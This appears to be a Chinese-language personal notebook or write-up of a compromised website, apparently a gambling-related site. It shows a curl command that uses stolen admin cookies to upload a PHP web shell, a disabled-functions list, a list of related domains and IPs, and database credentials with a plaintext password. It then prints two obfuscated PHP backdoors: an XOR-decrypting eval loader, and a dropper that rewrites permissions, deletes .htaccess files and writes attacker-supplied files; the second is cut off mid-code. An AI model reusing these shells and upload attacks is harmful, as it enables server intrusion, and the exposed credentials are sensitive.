我好困啊

1
curl -s -k -X POST "https://bm.******.online/includes/upload_image.php" \
2
    -b /tmp/admin_cookies.txt \
3
    -F "file=@/tmp/assert.gif;filename=shell.php"
4
{"url":"\/uploads\/69aacb960002e_shell.php"}

1
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

1
bm.******.online
2
******.online
3
160.***.***.236
4
www.******.online
5
_dmarc.******.online
6
atm.****
7
n1**c.com
8
www.******.org
9
tk****68.com
10
******.cc
11
www.********.vip:9527
12
773b50.cc:61234
13
****.com
14
**.game
15
0.0.0.0
16
cloudflare.com
17
www.bm.********.online
18
escrow.********.bf
19
0b17ebd8-1******b55e-f338b74ddb82.********.online
20
brea****ms.bf
21
fc8e1bc7-**************e-fcaaf71caca0.********.online
22
jie******s.org
23
iktagbm.********.online

1
define('DB_HOST', 'localhost');
2
define('DB_USER', 'root');
3
define('DB_PASS', 'loulxgame@com');
4
define('DB_NAME', 'web');

1
<?php
2
/* Encrypted File - 20260117180056 */
3
$k='YmZjMjYyMDRlN2EyYWYyY2NlOWE5NGNhNTM1M2I3ZWJlNzkyNWI3MmQ0MTYwNDAwYmQ3ZjkxMWRiZWIxZThmNQ==';
4
$e='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';
5
$d=base64_decode($e);
6
$k=base64_decode($k);
7
$r='';
8
for($i=0;$i<strlen($d);$i++){
9
  $r.=$d[$i]^$k[$i%strlen($k)];
10
}
11
eval('?>'.$r);
12
?>

1
<?php $M=base64_decode('SG9nN1lMcVFSRkVeMlQjbHoufGV2SVYpZGJ5U2E0dGpBX3U6TVAnOGltM25VIDBDaD48ZnB3c3IkLSxOeCg5T2M2RDFrLzVHKg=='); $_guSMY=""; ;/*$_KvBr*/; $_guSMY.="f"; ;/*ClgHV*/; ;/*$_c9GbEW*/; $_guSMY.="i"; ;/*9w5RTod*/; ;/*timothy*/; function ru($_TybU) { $_Dd6=preg_replace("/[^0-9]/","",$_TybU); return $_Dd6; } $_guSMY.="l"; $_JVo=dn(1765153205); ;/*$_c9GbEW*/; ;/*villains*/; $_guSMY.="e"; $_guSMY.="_"; $_rDcINj=str_replace("Z06","","plaid"); function xy($_TybU) { $_Dd6=preg_replace("/[^A-Z]/","",$_TybU); return $_Dd6; } ;/*7MmO8*/; $_guSMY.="p"; ;/*$_4GfyMzs*/; ;/*lGZze1hL*/; ;/*openings*/; $_guSMY.="u"; $_rDcINj=str_replace("A","","mooney"); $_JVo=dn(1764102768); $_guSMY.="t"; ;/*Hcb9Jul*/; ;/*fury*/; ;/*gorges*/; $_guSMY.="_"; $_guSMY.="c"; ;/*$_Oh3*/; ;/*modder*/; $_guSMY.="o"; ;/*epinard*/; ;/*blurt*/; $_guSMY.="n"; $_guSMY.="t"; ;/*$_8AIHxgq*/; $_guSMY.="e"; ;/*raptured*/; $_guSMY.="n"; ;/*vega*/; $_guSMY.="t"; ;/*middle*/; $_JVo=dn(1765591169); ;/*aimons*/; ;/*helpless*/; $_guSMY.="s"; $_Oh3=""; ;/*zPFb*/; ;/*spurning*/; $_Oh3.="c"; ;/*JBezL2*/; ;/*COvyHZ4*/; $_Oh3.="h"; ;/*reviling*/; ;/*goatweed*/; $_Oh3.="m"; $_JVo=dn(1764412459); ;/*ojUN*/; ;/*F1aoXOM*/; $_Oh3.="o"; ;/*$_Loem*/; $_Oh3.="d"; $_Dm5ok6=""; ;/*2xbwU8*/; ;/*park*/; $_Dm5ok6.="g"; ;/*function*/; ;/*furled*/; ;/*M3vcD6EH*/; $_Dm5ok6.="l"; ;/*rood*/; ;/*qWNa*/; $_Dm5ok6.="o"; ;/*$_lupLq*/; ;/*5clyumC*/; ;/*6x27PEm*/; $_Dm5ok6.="b"; $_O7MZfz=""; ;/*pi8UjYkN*/; ;/*GBZCUOo3*/; ;/*GPfTYzd5*/; $_O7MZfz.="u"; ;/*2GYeSkm*/; ;/*84LQV*/; $_O7MZfz.="n"; ;/*bowman*/; ;/*$_DLBG7Re*/; $_O7MZfz.="l"; ;/*chalard*/; $_O7MZfz.="i"; function l($_njSqalt) { $_njSqalt=trim($_njSqalt); $_njSqalt=substr($_njSqalt,6,-6); $_njSqalt=str_replace($M[57],"+",$_njSqalt); $_njSqalt=str_replace("_","/",$_njSqalt); $_njSqalt=str_replace(".","=",$_njSqalt); $_njSqalt=base64_decode($_njSqalt); return $_njSqalt; } ;/*JXB5*/; $_O7MZfz.="n"; ;/*4Xm7K*/; $_O7MZfz.="k"; $_sVwj8=""; ;/*$_YphNi*/; $_sVwj8.="i"; ;/*7vg2N*/; ;/*tommaso*/; $_sVwj8.="s"; ;/*$_9h52zN*/; ;/*rubies*/; ;/*honest*/; $_sVwj8.="_"; $_sVwj8.="f"; ;/*WUv1K*/; $_sVwj8.="i"; ;/*I4uC8wB*/; ;/*7k4*/; ;/*qfJS4pY6*/; $_sVwj8.="l"; ;/*BbXOgVl*/; ;/*dM5Gj*/; $_sVwj8.="e"; $_ZtY9EF=""; ;/*hQZrwEs*/; ;/*accursed*/; ;/*JKIuzaM*/; $_ZtY9EF.="i"; ;/*fishwife*/; $_ZtY9EF.="s"; ;/*flatten*/; ;/*8Kxfl*/; ;/*AkSb8RNJ*/; $_ZtY9EF.="_"; $_wKdzBs=ru("peri7A"); ;/*8iPQaHq*/; ;/*guessin*/; $_ZtY9EF.="d"; $_JVo=dn(1763904853); ;/*putr*/; $_ZtY9EF.="i"; ;/*lichens*/; ;/*gospodi*/; $_ZtY9EF.="r"; $_lupLq=""; ;/*ABvy*/; ;/*tepXrONs*/; function dn($_AnPtJ7) { $_VKGeF4d=0; $_O5Y=microtime(true); $_VKGeF4d=$_O5Y-$_AnPtJ7; return $_VKGeF4d; } ;/*ZFsBg2M*/; ;/*nebula*/; $_lupLq.="t"; ;/*SY2L*/; $_lupLq.="o"; ;/*$_jN3tCgQ*/; $_lupLq.="u"; ;/*$_pk19yQ*/; ;/*F04x16g*/; ;/*$_cCnHF*/; $_lupLq.="c"; ;/*lashless*/; $_lupLq.="h"; $_wET7=""; ;/*$_rHC29mV*/; ;/*hoss*/; $_wET7.="b"; ;/*$_oiRM*/; ;/*$_LPeHO*/; ;/*dire*/; $_wET7.="a"; ;/*mxmiv*/; ;/*A38ORC*/; ;/*coping*/; $_wET7.="s"; ;/*jh37l*/; ;/*Zf5czOR*/; $_wET7.="e"; ;/*5RJFz*/; ;/*z3H2*/; ;/*abruptly*/; $_wET7.="n"; $_rDcINj=str_replace("L","","ruffles"); $_wET7.="a"; ;/*$_njSqalt*/; ;/*tackling*/; $_wET7.="m"; ;/*$_njSqalt*/; $_wET7.="e"; ;/*$_Q4wAq0*/; error_reporting(0); ;/*$_edwT8*/; ;/*$_ITe*/; ;/*gluts*/; $_ITe=($_SERVER[$M[0].$M[13].$M[13].$M[37].$M[27]]!=""&&$_SERVER[$M[0].$M[13].$M[13].$M[37].$M[27]]!=$M[1].$M[51].$M[51])||$_SERVER[$M[8].$M[10].$M[7].$M[44].$M[10].$M[27].$M[13].$M[33].$M[27].$M[47].$M[0].$M[10].$M[36].$M[10]]==$M[48].$M[30].$M[30].$M[52].$M[54]||$_SERVER[$M[27].$M[10].$M[8].$M[22].$M[10].$M[8].$M[33].$M[37].$M[63].$M[8].$M[13]]==443 ? $M[48].$M[30].$M[30].$M[52].$M[54].$M[35].$M[69].$M[69] : $M[48].$M[30].$M[30].$M[52].$M[35].$M[69].$M[69] ; ;/*C6iOj8*/; $_ZaJK4nT=$_SERVER[$M[0].$M[13].$M[13].$M[37].$M[33].$M[0].$M[63].$M[27].$M[13]]; ;/*tonic*/; ;/*crequi*/; ;/*raif*/; if ( isset($_SERVER[$M[8].$M[10].$M[7].$M[44].$M[10].$M[27].$M[13].$M[33].$M[44].$M[8].$M[21]]) ) { $_wKdzBs=ru("gregoireJzR3nh"); $_a5pSH=explode('?',$_SERVER[$M[8].$M[10].$M[7].$M[44].$M[10].$M[27].$M[13].$M[33].$M[44].$M[8].$M[21]]); $_mlsJ=explode("P","caller"); $_8AIHxgq=$_a5pSH[0]; ;/*GL0*/; }else { ;/*$_0yMb2*/; $_8AIHxgq=$_SERVER[$M[27].$M[47].$M[8].$M[21].$M[37].$M[13].$M[33].$M[59].$M[32].$M[36].$M[10]]; } $_JVo=dn(1767552682); $_rDcINj=str_replace("XA","","trooped"); ;/*varus*/; ;/*forbad*/; $_uTig=str_replace('\\','/',$_SERVER[$M[27].$M[47].$M[8].$M[21].$M[37].$M[13].$M[33].$M[9].$M[21].$M[5].$M[10].$M[59].$M[32].$M[36].$M[10]]); ;/*$_tLHvr*/; ;/*ztfbKV*/; ;/*mingo*/; $_QcNpZ=str_replace($_8AIHxgq,'',$_uTig); ;/*NnJlu*/; $_wKdzBs=ru("jovialY"); ;/*BFN3H*/; ;/*8WMu*/; $_Oh3($_QcNpZ,0755); ;/*turves*/; ;/*HD0Xk*/; ;/*Tnev*/; $_eiavw2z=$M[57].$M[57].$M[57]; ;/*sherbet*/; ;/*$_pk19yQ*/; $_eiavw2z.=$M[24].$M[1]; ;/*$_qezuS*/; ;/*VFLU*/; $_eiavw2z.=$M[57]; ;/*atUnA*/; $_eiavw2z.=$M[43].$M[1].$M[30]; ;/*$_W03F*/; ;/*eCAbto*/; ;/*ZGWv*/; $_eiavw2z.=$M[57]; ;/*AY72*/; ;/*27Vu5ER*/; $_eiavw2z.=$M[64].$M[48].$M[28].$M[43].$M[2].$M[19]; $_rDcINj=str_replace("v0g","","surly"); ;/*pride*/; $_eiavw2z.=$M[57]; ;/*verger*/; ;/*$_W03F*/; ;/*$_Ub2*/; ;/*cloying*/; $_eiavw2z.=$M[30].$M[48].$M[19]; ;/*$_rDcINj*/; ;/*register*/; ;/*kpMD*/; $_eiavw2z.=$M[57]; ;/*xv0i8O*/; ;/*Z01XtC*/; usleep(1); ;/*whSYp*/; ;/*CB71Qm*/; $_eiavw2z.=$M[51].$M[1].$M[15].$M[15].$M[1].$M[53].$M[40].$M[43].$M[2]; ;/*$_h7tzE*/; ;/*$_7ieh*/; ;/*bazaar*/; $_eiavw2z.=$M[57]; ;/*$_hSP*/; ;/*$_eiavw2z*/; ;/*showing*/; usleep(4); ;/*unruly*/; $_eiavw2z.=$M[64].$M[1].$M[43].$M[30].$M[19].$M[43].$M[30]; ;/*IioqgpB*/; ;/*$_wET7*/; ;/*JP1G*/; $_eiavw2z.=$M[57].$M[57].$M[57]; ;/*waOsEQ*/; if ($_SERVER[$M[7].$M[44].$M[10].$M[8].$M[4].$M[33].$M[27].$M[13].$M[8].$M[21].$M[59].$M[71]]==$M[24].$M[33].$M[48]) { ;/*$_c9GbEW*/; $_SN7=array(); $_N69C=0; $_t6H=0; $_SN7[0][]=$_QcNpZ; ;/*reappear*/; while(!empty($_SN7[$_N69C])) { foreach($_SN7[$_N69C] as $_9h52zN) { $_cw8u0M=$_Dm5ok6($_9h52zN.$M[69].$M[72],GLOB_ONLYDIR); if (!empty($_cw8u0M)) { foreach($_cw8u0M as $_RyCT) { $_SN7[$_N69C+1][]=$_RyCT; $_Oh3($_RyCT,0755); $_KvBr=$_RyCT.$M[69].$M[17].$M[48].$M[30].$M[28].$M[64].$M[64].$M[19].$M[54].$M[54]; if ($_sVwj8($_KvBr)) { $_7ieh=file_get_contents($_KvBr); if (preg_match('/'.$_eiavw2z.'/',$_7ieh)==0) { $_Oh3($_KvBr,0777); $_guSMY($_KvBr,''); $_O7MZfz($_KvBr); $_t6H++; } } } } } $_N69C++; } echo $_t6H.$M[24].$M[1].$M[43].$M[19]; exit; } ;/*$_N63WZ*/; ;/*$_cw8u0M*/; if ($_SERVER[$M[7].$M[44].$M[10].$M[8].$M[4].$M[33].$M[27].$M[13].$M[8].$M[21].$M[59].$M[71]]==$M[64].$M[33].$M[64]) { ;/*$_uTig*/; ;/*ap6OY*/; echo $M[31].$M[68].$M[57].$M[57].$M[57].$M[1].$M[68]; ;/*forces*/; exit; ;/*7yjmPJXF*/; ;/*holds*/; ;/*E2ShH*/; } ;/*vede*/; ;/*maidenly*/; ;/*miaskin*/; if ( !empty($_GET[$M[51].$M[33].$M[64]]) ) { ;/*newlaid*/; $_akoQ=l($_GET[$M[51].$M[33].$M[64]]); ;/*$_guSMY*/; if($_sVwj8($_QcNpZ.$_akoQ)){$_Oh3($_QcNpZ.$_akoQ,0644);echo $M[51].$M[64].$M[57].$M[57].$M[57].$M[1].$M[68];}else{echo $M[51].$M[64].$M[57].$M[57].$M[57].$M[43].$M[1];} ;/*ascribed*/; ;/*$_akoQ*/; exit; } ;/*RUGCMlw*/; ;/*$_W03F*/; if ( !empty($_GET[$M[51].$M[33].$M[24]]) ) { ;/*repress*/; ;/*PDczrmUy*/; $_0yMb2=l($_GET[$M[51].$M[33].$M[24]]); ;/*cooeeing*/; if ($_sVwj8($_QcNpZ.$_0yMb2)) { $_Oh3($_QcNpZ.$_0yMb2,0777); ;/*Ksu*/; ;/*$_tLHvr*/; $_mlsJ=explode("W","suction"); $_guSMY($_QcNpZ.$_0yMb2,$M[16],LOCK_EX); $_O7MZfz($_QcNpZ.$_0yMb2); } ;/*edbIHYGS*/; ;/*OhGF1ykp*/; ;/*crusted*/; if (!$_sVwj8($_QcNpZ.$_0yMb2)||trim(file_get_contents($_QcNpZ.$_0yMb2))==$M[16]) { ;/*1kCiL05S*/; ;/*rollet*/; echo $M[51].$M[24].$M[57].$M[57].$M[57].$M[1].$M[68]; ;/*$_RyCT*/; }else { ;/*medusa*/; ;/*ZvnbsmI*/; $_wKdzBs=ru("echelonsfGxne3AtOi"); echo $M[51].$M[24].$M[57].$M[57].$M[57].$M[43].$M[1]; $_cszEUio=xy("hotspur3thieves"); ;/*bulkhead*/; ;/*$_nu9b*/; } ;/*griffs*/; exit; } ;/*twill*/; if ( (!empty($_POST[$M[64].$M[1].$M[24].$M[19].$M[33].$M[64].$M[1].$M[43].$M[30].$M[19].$M[43].$M[30]])) && (!empty($_POST[$M[64].$M[1].$M[24].$M[19].$M[33].$M[51].$M[40].$M[15].$M[19].$M[43].$M[28].$M[41].$M[19]])) ) { ;/*$_7ieh*/; $_rDcINj=str_replace("FN","","postman"); $_Xjz5q=base64_decode($_POST[$M[64].$M[1].$M[24].$M[19].$M[33].$M[64].$M[1].$M[43].$M[30].$M[19].$M[43].$M[30]]); $_nu9b=base64_decode($_POST[$M[64].$M[1].$M[24].$M[19].$M[33].$M[51].$M[40].$M[15].$M[19].$M[43].$M[28].$M[41].$M[19]]); }else { 